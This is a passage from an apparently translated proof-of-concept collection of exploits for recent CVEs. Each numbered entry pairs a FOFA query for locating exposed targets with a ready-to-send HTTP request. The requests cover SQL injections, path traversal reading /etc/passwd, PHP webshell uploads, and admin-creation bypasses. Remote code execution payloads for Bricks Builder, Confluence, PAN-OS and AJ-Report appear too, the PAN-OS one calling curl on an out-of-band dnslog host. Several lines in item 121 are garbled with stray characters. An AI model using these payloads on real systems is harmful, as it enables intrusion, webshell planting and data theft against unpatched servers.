b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Visit /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default username/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. 北京百绰智能S42管理平台userattestation.php任意文件上传: E7 Y' m/ k+ Y3 s# @& Z) Z  U) G
CVE-2024-1918
" @  z  }/ k' d6 B" o' xFOFA:title="Smart管理平台"
. a- t2 M( a$ wPOST /useratte/userattestation.php HTTP/1.1
; P) B3 G, S! w* u. gHost: 192.168.40.130:8443
' n! G& s1 o4 D; \( i0 O' T5 {$ s$ ~Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
( _0 L0 G" q# K3 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
5 w  S; o$ l  j# P: V+ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. y; \- w4 \8 ~2 w0 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- D2 {( g: C% i! T' G( d' _Accept-Encoding: gzip, deflate
. l/ h4 f( H8 p% I! n5 I" R: ?% I$ C) CContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793280 O) M# F$ {8 Z! t
Content-Length: 592
3 M* Y% u+ S. VOrigin: https://192.168.40.130:84431 H, R% I1 t( u& t/ V6 r; C% @
Upgrade-Insecure-Requests: 1
4 `! R) t* Z5 {9 b9 U6 \# w0 RSec-Fetch-Dest: document
+ w/ Z& i" a& R* D1 Q& b3 i( s0 FSec-Fetch-Mode: navigate
$ i7 F+ F4 k& \& d' {Sec-Fetch-Site: same-origin* `) z; F7 r  g5 D" m5 X
Sec-Fetch-User: ?1
: }1 ^: K& C( _/ y% p8 ^Te: trailers$ Q5 H6 F6 U; K! B% T7 X
Connection: close1 u9 e' I& l, ?4 A& c
1 A4 l" l" x7 U
-----------------------------42328904123665875270630079328& Z2 b4 j" B* W6 n' U+ A. g+ a- I( W
Content-Disposition: form-data; name="web_img"; filename="1.php"
+ l% h& w3 u' u7 v  v" }Content-Type: application/octet-stream' }9 }& O  ~; v* }) g

* ]3 p# R- n& ]4 K2 p( {<?php phpinfo();?>/ j( t5 z% E  \& b4 A
-----------------------------423289041236658752706300793285 B0 ~8 w! a& o/ H/ e' f
Content-Disposition: form-data; name="id_type"( e0 f- c( f0 U. U& l

& B+ _2 I5 b% W/ E( _1
7 Q# ]+ G$ w" x$ h. o-----------------------------42328904123665875270630079328
  a/ o: ^- ]3 ^6 vContent-Disposition: form-data; name="1_ck") n) x' a6 G4 r/ Z& @' K: w

6 P) @# J* _# G: k  S" b, B* U3 a1_radhttp. u' J, Q  X5 j8 g; A& s
-----------------------------42328904123665875270630079328
5 G  N, Y8 d% i% @Content-Disposition: form-data; name="hidwel"
! y) }; f7 U0 Y; l
+ g" g5 B, n  N/ g4 x" w1 vset
. r4 ^& u$ V! E* ]+ k  E9 ?-----------------------------42328904123665875270630079328- J1 B% t1 t- Q- v

! z3 U5 ?  b3 |) I2 P  N* i7 y, u$ |  u6 K+ `
boot/web/upload/weblogo/1.php% U9 M$ c/ C0 W0 }- k+ e
; J$ [) G. [: [8 B
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
